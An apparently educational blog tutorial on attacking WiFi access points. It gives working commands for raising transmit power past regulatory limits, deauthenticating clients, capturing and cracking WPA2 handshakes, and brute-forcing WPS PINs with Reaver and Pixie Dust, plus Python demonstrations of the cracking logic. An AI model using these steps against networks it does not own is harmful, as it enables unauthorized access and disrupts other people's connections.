WiFi Hacking Week Pt. 3 — Abusing the Infrastructure

Welcome to part three of a five (six?) part series on WiFi security and lack thereof. In the last article we covered basic WiFi recon on Linux and prepared for what we will be covering in this one — attacking wireless access points. I highly recommend you read the previous article before following along, or be sure you’re already familiar with basic packet-sniffing techniques and command-line tools such as airodump-ng, tcpdump, iw, iwconfig… you know, WiFi stuff.

Rules and Regulations

Before we start with the fun attacking stuff I want to show you a little trick that will not only come in handy later in this post, but in the next one as well. We are going to increase our wireless adapter’s transmission power, or txpower. As with the last couple of articles we will be using the adapter name ‘alfa’. If you’re following along you’ll want to either rename your adapter, or replace ‘alfa’ with your own adapter name.

Ok, first let’s get some info.

dj@siriusA # iw reg get
global
country 00: DFS-UNSET
(2402 - 2472 @ 40), (N/A, 20), (N/A)
(2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
(2474 - 2494 @ 20), (N/A, 20), (N/A), NO-OFDM, PASSIVE-SCAN
(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
(5250 - 5330 @ 80), (N/A, 20), (0 ms), DFS, AUTO-BW, PASSIVE-SCAN
(5490 - 5730 @ 160), (N/A, 20), (0 ms), DFS, PASSIVE-SCAN
(5735 - 5835 @ 80), (N/A, 20), (N/A), PASSIVE-SCAN
(57240 - 63720 @ 2160), (N/A, 0), (N/A)

What we’re doing here is requesting the regulatory domain information. What is regulatory domain information, you ask? Regulators such as the FCC publish country-specific rules for how radio transmitters such as wireless adapters and antennae may be used: which frequency ranges are open, how wide a channel may be, and how much power may be transmitted. Linux carries a copy of those rules (the wireless regulatory database) and enforces them in the wireless stack. Each line above is one rule: a frequency range in MHz, the maximum channel width, a pair of (max antenna gain in dBi, max EIRP in dBm), and some flags. ‘country 00’ is the world domain, the conservative default in force before a specific country is set. If you take a look at the numbers you’ll see they go up to 2494 before jumping to 5170: that is the 2.4 GHz band ending and the 5 GHz band beginning. Remember changing the channel our WiFi adapter is listening on in the last post? Channels are just named centre frequencies inside those ranges (channel 1 is 2412 MHz, channel 6 is 2437 MHz, channel 14 is 2484 MHz). Now if we look a little further in the output…

phy#0 (self-managed)
country US: DFS-UNSET
(2402 - 2437 @ 40), (6, 22), (N/A), AUTO-BW, NO-HT40MINUS, NO-80MHZ, NO-160MHZ
(2422 - 2462 @ 40), (6, 22), (N/A), AUTO-BW, NO-80MHZ, NO-160MHZ
(2447 - 2482 @ 40), (6, 22), (N/A), AUTO-BW, NO-HT40PLUS, NO-80MHZ, NO-160MHZ
(5170 - 5190 @ 80), (6, 22), (N/A), AUTO-BW, NO-HT40MINUS, NO-160MHZ
(5190 - 5210 @ 80), (6, 22), (N/A), AUTO-BW, NO-HT40PLUS, NO-160MHZ
(5210 - 5230 @ 80), (6, 22), (N/A), AUTO-BW, NO-HT40MINUS, NO-160MHZ
(5230 - 5250 @ 80), (6, 22), (N/A), AUTO-BW, NO-HT40PLUS, NO-160MHZ

This second table is for the United States, and it belongs to phy#0 only: the ‘self-managed’ tag means that phy’s driver ships its own regulatory table instead of using the global one. As you can see, the ranges are band edges in MHz, not channel centres, and this table stops at 2482 before switching to 5170. Channel 14 is centred at 2484 MHz and occupies 2474 to 2494, so it does not fit inside this table; in the US the FCC only permits channels 1 through 11 in any case. Check it out.

dj@siriusA # sudo iwconfig alfa channel 14
dj@siriusA # iwconfig alfa
alfa IEEE 802.11 ESSID:off/any
Mode:Managed Frequency:2.484 GHz Access Point: Not-Associated
Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

You can see the frequency is set at 2.484 GHz. As a side note, notice that the Tx-Power field is 20 dBm, which is exactly the limit the world domain lists in its (N/A, 20) tuples. Ok, now try setting the channel higher.

dj@siriusA # sudo iwconfig alfa channel 15
Error for wireless request "Set Frequency" (8B04) :
SET failed on device alfa ; Invalid argument.

Fun stuff. Now, why does the US table top out at 2482 while the card happily tunes to 2.484 GHz? The self-managed table applies only to phy#0; a second adapter is a separate phy and follows the global table, where the (2474 - 2494 @ 20) rule permits channel 14 (NO-OFDM means 802.11b rates only, which is how Japan allows that channel). If ‘alfa’ is that second phy, the kernel is doing exactly what its table says: channel 14 fits a rule, and the request for channel 15 below fails because no rule covers it. The kernel’s wireless-regdb documentation covers this in detail. Time to start messing with the transmission settings.

Powering Up

So earlier in the ‘iw reg get’ output we saw a line

country 00: DFS-UNSET

We need to set a country code in order to change the txpower: the kernel clamps any request to the maximum EIRP listed for the current domain, and the world domain 00 caps 2.4 GHz at 20 dBm. You want a domain whose table lists a higher limit than the one you’re currently under.

dj@siriusA # sudo iw reg set BT

I chose Bhutan because, well, I’m lazy and that country code was at the top of a list somewhere.

dj@siriusA # sudo ip link set alfa down
dj@siriusA # sudo iw dev alfa set txpower fixed 3000
dj@siriusA # iwconfig alfa
alfa IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

Note the unit: iw takes the power in mBm, hundredths of a dBm, so 3000 mBm is 30 dBm. We’ve now set the Tx-power ten decibels higher, from 20 dBm (100 mW) to 30 dBm (1 W), a tenfold increase. Two caveats: the driver still clamps at whatever the hardware can actually deliver, so read the value back (‘iw dev alfa info’ shows it too) rather than trusting the number you typed, and the new limit only applies on channels the new domain allows at that level. You don’t really get to immediately benefit from that, but now you know how. Like I said, this will come in handy later. Oh, one more thing. As I stated earlier, organizations like the FCC regulate this sort of thing for a reason, so this may be illegal in your country. Go check. Or don’t. Whatever.
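To make that check systematic, here is an added example (my code, not from the original post and not part of iw) that parses the text ‘iw reg get’ prints, works out the permitted EIRP for a given 2.4 GHz channel, and only then builds the ‘iw dev … set txpower’ command in the right unit. The sample table, the interface name ‘alfa’ and the channel numbers are constructed from the output shown above; the command-line entry point at the bottom reads the live table and needs root.

```python
"""Regulatory check before raising txpower.
Added example for this article (not from the original post, not part of iw).
Parses the text 'iw reg get' prints, finds the permitted EIRP for a 2.4 GHz
channel, and builds the 'iw dev <iface> set txpower' command in mBm.
The sample table, interface name and channels below are constructed."""
import re
import subprocess
import sys

# Constructed sample of 'iw reg get' output: world domain, then a self-managed phy.
SAMPLE_REG = """global
country 00: DFS-UNSET
\t(2402 - 2472 @ 40), (N/A, 20), (N/A)
\t(2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
\t(2474 - 2494 @ 20), (N/A, 20), (N/A), NO-OFDM, PASSIVE-SCAN
\t(5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN

phy#0 (self-managed)
country US: DFS-UNSET
\t(2402 - 2437 @ 40), (6, 22), (N/A), AUTO-BW, NO-HT40MINUS
\t(2422 - 2462 @ 40), (6, 22), (N/A), AUTO-BW
"""

# One rule line: (lo - hi @ max_bw), (max_antenna_gain_dBi, max_eirp_dBm), ...
RULE_RE = re.compile(r"\((\d+) - (\d+) @ (\d+)\), \((?:N/A|\d+), (\d+)\)")


def parse_reg(text):
    """Map each table ('global' or a 'phy#N (self-managed)' line) to its rules
    as (lo_mhz, hi_mhz, max_bw_mhz, max_eirp_dbm) tuples."""
    tables, current = {}, None
    for line in text.splitlines():
        if line.startswith(("global", "phy#")):
            current = line.strip()
            tables[current] = []
        elif line.startswith("country") and current is None:
            current = "global"          # older iw omits the 'global' header
            tables[current] = []
        else:
            m = RULE_RE.search(line)
            if m and current is not None:
                lo, hi, bw, eirp = (int(g) for g in m.groups())
                tables[current].append((lo, hi, bw, eirp))
    return tables


def channel_to_mhz(channel):
    """2.4 GHz channel centre frequencies; channel 14 is the odd one out."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError("only 2.4 GHz channels 1-14 are handled here")


def max_eirp_dbm(rules, freq_mhz, width_mhz=20):
    """Max EIRP for a channel of width_mhz centred on freq_mhz, or None when no
    single rule contains the whole channel (the kernel refuses such a channel)."""
    half = width_mhz // 2
    for lo, hi, bw, eirp in rules:
        if lo <= freq_mhz - half and freq_mhz + half <= hi and width_mhz <= bw:
            return eirp
    return None


def txpower_problem(reg_text, table, channel, dbm):
    """Explain why dbm is not allowed on that channel under that table, or None."""
    rules = parse_reg(reg_text).get(table)
    if rules is None:
        return f"no regulatory table named {table!r}"
    freq = channel_to_mhz(channel)
    limit = max_eirp_dbm(rules, freq)
    if limit is None:
        return f"channel {channel} ({freq} MHz) is not permitted by {table}"
    if dbm > limit:
        return f"{dbm} dBm exceeds the {limit} dBm limit at {freq} MHz"
    return None


def txpower_command(iface, dbm):
    """argv for iw. The unit is mBm (hundredths of a dBm): 30 dBm is 3000 mBm."""
    return ["iw", "dev", iface, "set", "txpower", "fixed", str(dbm * 100)]


def plan_txpower(reg_text, table, channel, dbm, iface):
    """The iw argv if the request is within the regulatory limit, else None."""
    if txpower_problem(reg_text, table, channel, dbm) is not None:
        return None
    return txpower_command(iface, dbm)


if __name__ == "__main__":
    # Usage (as root): txpower_check.py <iface> <channel> <dBm>; reads the live table.
    iface, channel, dbm = sys.argv[1], int(sys.argv[2]), int(sys.argv[3])
    live = subprocess.run(["iw", "reg", "get"], capture_output=True, text=True, check=True).stdout
    problem = txpower_problem(live, "global", channel, dbm)
    if problem:
        sys.exit(f"refusing: {problem}")
    subprocess.run(["ip", "link", "set", iface, "down"], check=True)
    subprocess.run(txpower_command(iface, dbm), check=True)
    subprocess.run(["ip", "link", "set", iface, "up"], check=True)
    subprocess.run(["iw", "dev", iface, "info"], check=True)   # confirm the reported txpower
```

The check uses the whole 20 MHz channel, not just its centre, because that is how the kernel decides whether a channel is usable; it reads the ‘global’ table, so if your adapter is a self-managed phy pass that phy’s table name instead.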

Cracking WPA2 Authentication

Normally these sorts of articles start with cracking WEP and then graduate to WPA/WPA2 networks. While I agree that it’s important to learn your history before you start trying to pave a path through this brave new world, there are many great articles that cover cracking WEP networks better than I could. Not only that, but I haven’t seen very many WEP networks around recently, have you? Don’t let me stop you from learning about it if you want to though. Aircrack’s article never fails.

For those of you who don’t know, WPA stands for WiFi Protected Access. WPA is a security protocol used to protect wireless communications. It was created as a stopgap replacement for WEP, whose glaring design flaws made breaking its encryption trivial, and it kept WEP’s RC4 cipher in a patched-up form called TKIP. In 2004 WPA2 was introduced, replacing TKIP with CCMP, an AES-based mode, making it a much more resilient protocol. However, at the ripe old age of seventeen WPA2 is something of a dinosaur, and vulnerabilities such as KRACK (Key Reinstallation Attack, 2017) have since been discovered. That attack, and the more recent WPA3, which improves upon many aspects of WPA2 (notably replacing the passphrase-derived key we’re about to attack with the SAE handshake), are outside the scope of this tutorial.

Without further ado, let’s get started.

Choosing the Target

First thing we’ll do is set our adapter into monitor mode and start observing traffic on nearby networks. Chances are you’re hoping to crack the password of a specific access point, so you’ll want to keep an eye out for your target’s MAC address.

dj@siriusA # sudo ip link set alfa down
dj@siriusA # sudo iwconfig alfa mode monitor
dj@siriusA # sudo ip link set alfa up
dj@siriusA # sudo airodump-ng alfa

In this case I’ll choose an access point I own, because I’m blogging on the internet and attacking your neighbor’s router is rude. Aside from the MAC address (the BSSID) you’ll also need to take note of the channel the access point is operating on. My access point appears to be operating on channel 1.

sudo airodump-ng --bssid DC:FE:07:FF:83:D8 -c 1 alfa -w output

We told airodump-ng to only observe traffic pertaining to the access point with the above MAC address. The -c flag locks the adapter on that channel so it stops hopping and misses nothing, and the -w flag dumps all captured traffic to a series of files whose names start with ‘output’. We need to dump the traffic in order to be able to crack it later: the handshake frames in that capture are what we’re after.

Now we can observe traffic between our target access point and any clients connected to it without all the other noise. You can see above that there is one client connected to the access point.

Getting Intrusive

At this point in the process there are a couple of ways you can proceed. We need to witness a client authenticating to the access point so we can capture the 4-way handshake we talked about in the first article of this series. The first option is to simply wait. Eventually someone is bound to connect to the access point, and when they do we will be there to intercept the handshake. Obviously you’ll want to make sure you’re close enough to the access point to see this happen. The second option is more aggressive. The aircrack-ng suite has a utility called aireplay-ng which allows us to inject frames into the network. If this is the route you choose it’s a good idea to test that injection actually works against this access point before we try to kick anyone off.

dj@siriusA # sudo aireplay-ng -e 86:EE:B0:38:E6:ED -a DC:FE:07:FF:83:D8 --test alfa
02:29:33  Trying broadcast probe requests...
02:29:33  Injection is working!
02:29:35  Found 1 AP
02:29:35  Trying directed probe requests...
02:29:35  DC:FE:07:FF:83:D8 - channel: 1 - '86:EE:B0:38:E6:ED'
02:29:35  Ping (min/avg/max): 1.390ms/3.697ms/6.534ms Power: -26.73
02:29:35  30/30: 100%

If you are seeing this output then congrats, you can successfully inject frames towards the target access point (--test is aireplay-ng’s injection test, attack mode 9; -a is the BSSID and -e the ESSID). Next we will use the same utility to inject de-authentication frames aimed at the specific client we saw a minute ago. Deauth is a management frame, and in plain WPA2 management frames are neither authenticated nor encrypted, so the client accepts the forged one, drops off, and reconnects, which means a fresh handshake for us to capture. If the network enforces 802.11w Protected Management Frames the client ignores the forgery and you’re back to waiting.

sudo aireplay-ng -0 1 -a DC:FE:07:FF:83:D8 -c 86:EE:B0:38:E6:ED alfa

Look for a WPA handshake in the upper right corner of the airodump-ng output.

If you see this you’ve successfully forced the client to re-authenticate and captured the resulting 4-way handshake. You’re almost there. It’s important to realize that going this route is extremely noisy and will almost certainly be noticed by detection systems if you’re trying to perform this attack in a corporate setting. At the very least, the client you just de-authed will notice a momentary lapse in connectivity. If you try this at a bar, the jukebox you inadvertently disconnected may stop playing music for a moment and announce to a room full of hot-blooded drunk apes that their buzz has been temporarily killed. Choose your targets wisely.

In the past I’ve found that aireplay-ng doesn’t always end up on the right channel. As long as airodump-ng is still running with -c and holding the adapter on the target’s channel this shouldn’t be an issue; if aireplay-ng complains that the interface is on a different channel than the AP, that is what has happened.

Going For the Kill

To be honest, this attack isn’t really all that sophisticated. All we’re really doing is performing some basic network sniffing, waiting for, or forcing, a client to perform the 4-way handshake, and then, once we’ve captured that and saved it to a file, guessing the passphrase offline. ‘Bruteforce’ here means: for each candidate passphrase, derive the PMK with PBKDF2-HMAC-SHA1 (4096 rounds, salted with the SSID), derive the PTK from it using the two MAC addresses and the two nonces visible in the handshake, and check whether the first 16 bytes of that PTK reproduce the MIC on the captured EAPOL frame. Nothing gets decrypted; a matching MIC is the proof. That’s all there is to it. It’s actually rather mundane. Regardless, let’s make it happen.

sudo aircrack-ng -w wordlist.txt -b DC:FE:07:FF:83:D8 output*.cap

This part depends largely on your wordlist and your patience. There are multiple ways to do this part too. If you don’t feel like using aircrack-ng you can also use hashcat, which runs the same check on a GPU: convert the capture with hcxpcapngtool and crack it in hash mode 22000. If you don’t have a computer with a GPU you can set up an AWS instance with one. Both hashcat usage and AWS are outside the scope of this tutorial.

If time is of the essence then this attack isn’t necessarily practical: every guess costs 4096 HMAC-SHA1 rounds by design, so an exhaustive bruteforce of WPA and WPA2 passphrases takes days at best and is hopeless against a long random one. The attack works when the passphrase is in a wordlist or follows a guessable pattern. However, there are other ways if the circumstances are right.
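To see what aircrack-ng is doing per guess, here is an added example in Python (my code, not aircrack-ng’s) that builds a constructed WPA2 message 2 of the handshake with a known passphrase and then recovers that passphrase from a small wordlist using the same PBKDF2 → PTK → MIC check. The SSID ‘lab-ap’, the nonces, the EAPOL frame, the RSN information element and the wordlist are all constructed in-script; the MAC addresses are the ones from the capture above.

```python
"""What 'cracking the handshake' computes for each candidate passphrase.
Added example for this article; it is not aircrack-ng's code. Everything
below (SSID, nonces, EAPOL frame, passphrase, wordlist) is constructed so the
check runs offline; the MAC addresses are the ones from the capture above."""
import hashlib
import hmac

SSID = "lab-ap"                             # constructed
AP_MAC = bytes.fromhex("dcfe07ff83d8")      # BSSID from the airodump-ng capture
STA_MAC = bytes.fromhex("86eeb038e6ed")     # the client we deauthed

# Offset of the 16-byte Key MIC inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are what makes every guess comparatively expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """PRF-512 from 802.11i: concatenated HMAC-SHA1 blocks, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Its first 16 bytes are the KCK, the key that authenticates the handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def build_msg2(snonce: bytes, key_data: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed EAPOL-Key frame laid out like message 2 of the 4-way handshake."""
    body = (b"\x02"                       # descriptor type: RSN
            + b"\x01\x0a"                 # key info: MIC set, pairwise, version 2 (HMAC-SHA1)
            + b"\x00\x10"                 # key length 16
            + (1).to_bytes(8, "big")      # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, key ID
            + mic + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key


def compute_mic(kck: bytes, eapol: bytes) -> bytes:
    """Descriptor version 2: HMAC-SHA1 over the frame with the MIC field zeroed, cut to 16."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC, or None."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(compute_mic(ptk[:16], eapol), captured_mic):
            return candidate
    return None


def make_sample_capture(passphrase: str):
    """Constructed 'capture': deterministic nonces and a message 2 signed with the real KCK."""
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK/CCMP RSN IE
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)
    mic = compute_mic(ptk[:16], build_msg2(snonce, rsn_ie))
    return anonce, snonce, build_msg2(snonce, rsn_ie, mic)


if __name__ == "__main__":
    anonce, snonce, eapol = make_sample_capture("lab-passphrase-2021")
    words = ["password", "letmein", "lab-passphrase-2021", "hunter2"]
    print(crack_handshake(SSID, AP_MAC, STA_MAC, anonce, snonce, eapol, words))
```

Two things worth noticing: the SSID is the PBKDF2 salt, so precomputed tables only help against common network names, and message 2 alone is enough because it carries the SNonce and a MIC while the ANonce comes from message 1; that is why airodump-ng can report a usable handshake without seeing all four messages.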

Attacking Access Points With Reaver

Have you ever seen that button on your router that has the letters WPS somewhere near it? That button exists as a way for the everyday homeowner to simplify the process of getting their access point set up and getting devices connected to it, without the hassle of configuring anything or entering in (hopefully) complex default credentials. It was introduced in 2006 and it’s fairly convenient if you don’t like touching anything besides buttons, but it has some issues. The major issue is the external registrar mode, in which a client proves it knows an 8 digit PIN. The last digit is a checksum, so there are only 7 digits to guess, which is just ten million possibilities to begin with. It’s much worse than that, though, as Stefan Viehböck showed in 2011: the protocol verifies the PIN in two halves, and the access point NACKs after message M4 when the first four digits are wrong and after M6 when the next three are wrong. An attacker can therefore guess the halves independently: at most 10,000 tries for the first half plus 1,000 for the second, 11,000 in total, and on average about half that. Once an attacker has the PIN the access point hands over the WPA2 key. Let’s explore that.
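Here is an added example (my code, not Reaver’s) that shows where the 11,000 figure comes from: the checksum digit computation, a constructed stand-in for a vulnerable registrar that NACKs each half of the PIN separately, and the split brute force that exploits it. The PINs and the ‘FakeRegistrar’ class are constructed for the demonstration and do not speak the real WPS protocol.

```python
"""WPS PIN: checksum digit and the split brute force that makes 11,000 the
worst case. Added example for this article; not Reaver's code. FakeRegistrar
is a constructed stand-in that answers the way a vulnerable AP does (NACK
after M4 for a wrong first half, NACK after M6 for a wrong second half)."""


def wps_checksum(first7: int) -> int:
    """Checksum digit over the first seven digits, weights 3,1,3,1,... from the right."""
    acc, n = 0, first7
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is eight digits whose last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def with_checksum(first7: str) -> str:
    """Append the checksum digit to a seven-digit string."""
    return first7 + str(wps_checksum(int(first7)))


class FakeRegistrar:
    """Constructed stand-in for the AP's WPS registrar (not a protocol implementation)."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("not a valid WPS PIN")
        self.pin = pin

    def attempt(self, pin: str) -> str:
        if pin[:4] != self.pin[:4]:
            return "NACK_M4"   # first half wrong: the AP aborts after M4
        if pin[4:] != self.pin[4:]:
            return "NACK_M6"   # second half wrong: the AP aborts after M6
        return "M7"            # both halves right: M7 carries the WPA PSK


def brute_force_pin(registrar):
    """Guess the halves independently. Returns (pin or None, attempts used);
    the worst case is 10,000 + 1,000 attempts rather than 10 million."""
    attempts = 0
    first = None
    for i in range(10_000):
        attempts += 1
        # any second half will do here: only the M4 verdict on the first half matters
        if registrar.attempt(with_checksum(f"{i:04d}000")) != "NACK_M4":
            first = f"{i:04d}"
            break
    if first is None:
        return None, attempts
    for j in range(1_000):
        attempts += 1
        pin = with_checksum(first + f"{j:03d}")
        if registrar.attempt(pin) == "M7":
            return pin, attempts
    return None, attempts


if __name__ == "__main__":
    print(brute_force_pin(FakeRegistrar("12345670")))   # ('12345670', 1803)
```

Against a real access point every ‘attempt’ is an association plus a full M1 to M4 (or M6) exchange, which is why the attack is slow, noisy, and why Reaver cares about the delay between attempts and about the AP reporting a locked state.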

dj@siriusA # sudo airodump-ng -W -w output alfa

You may have noticed that this airodump-ng invocation is slightly different from the previous one. We’ve added a -W flag in order to show each access point’s WPS information, if it exists. We can see in the output that there are access points in the area with both version 1 and 2 of WPS. The one at the bottom with LAB and DISP next to it? Those are the WPS configuration methods the device advertises: LAB means the PIN is printed on a label on the device and DISP means it is shown on a display; PBC, the push button, is another one you’ll see. The WPS specification describes the full list.

Another way we could do this is with a utility called wash.

dj@siriusA # sudo wash -i alfa
Don’t worry, I own these.

Newer routers may not be vulnerable to this attack as it’s definitely not brand new, so bear with me.

Ok. Assuming you’ve found your target you just need to take note of the MAC address and channel. We will use a tool called Reaver which was made specifically for the purpose of bruteforcing WPS-enabled routers.

dj@siriusA # sudo reaver -i alfa -b DC:FE:07:FF:83:D8 -d 3 -vvLN -c 1

This will perform an online bruteforce of the WPS PIN, one association and one PIN exchange per guess. The fact that it’s an online attack is exactly the reason why we learned how to increase our wireless adapter’s Tx-power earlier in this post. If your signal is too weak you may not be able to carry out this attack successfully, and you may see Reaver complaining in its output that it isn’t getting responses from the access point.

If this happens I’ve found increasing the Tx-power to be helpful, or changing the delay between attempts. That’s what the -d flag is for. The -vv just makes Reaver talkative, -L tells it to ignore the access point reporting that WPS is locked, and -N stops it sending NACKs of its own when frames arrive out of order. Be aware that many access points made after this attack became public lock WPS for a while after a handful of failed PINs, which turns the 11,000-guess worst case into a much longer wait. The other thing about this being an online attack is that, like the previous attack, this is extremely noisy. Save this attack method for helping your safety pin-averse friends recover their router’s password.

There is also a variant of this attack called Pixie Dust, published by Dominique Bongard in 2014. It isn’t about the size of the PIN: during the exchange the access point sends two nonces (E-S1 and E-S2) along with hashes that commit to the two PIN halves, and on many chipsets those nonces come from a weak or effectively unseeded random generator, so the attacker can recover the PIN offline from a single exchange instead of guessing online. To try it with Reaver just add the -K flag. I’ve had success with both and depending on the age and make of the access point you may find yourself discovering the password in as little as a few minutes.

Letting The (pixie) Dust Settle

I mentioned this earlier, but I’ll say it again for good measure; both of these attacks are more than a little old at this point. The WPS attack we just covered was discovered way back in 2011, making it older than our last significant end-of-the-world prediction. So old, in fact, that I almost didn’t post it on the internet at all due to lack of relevance. However, this was one step along a path I paved for myself a while back and I gained quite a bit of fundamental knowledge along the way. I felt I owed it to the community at large to share my interpretation of that knowledge regardless of its relevance in 2021. I hope you gained something from this article. If nothing else, perhaps it will inspire you to get yourself set up with an access point made after 2012, and to turn WPS off on whatever you have now. Your home network deserves it.

If you’ve kept up thus far I feel I owe you a beer or something. In the next article we are going to pivot from attacking infrastructure to something that will hopefully make you suspicious the next time you see an open WiFi network at your local artisanal bean-water shop. See you soon.




DJ Nelson

Sharing my passion for the world of hacking and bug bounty hunting, and their relation to my unique adventures and experiences.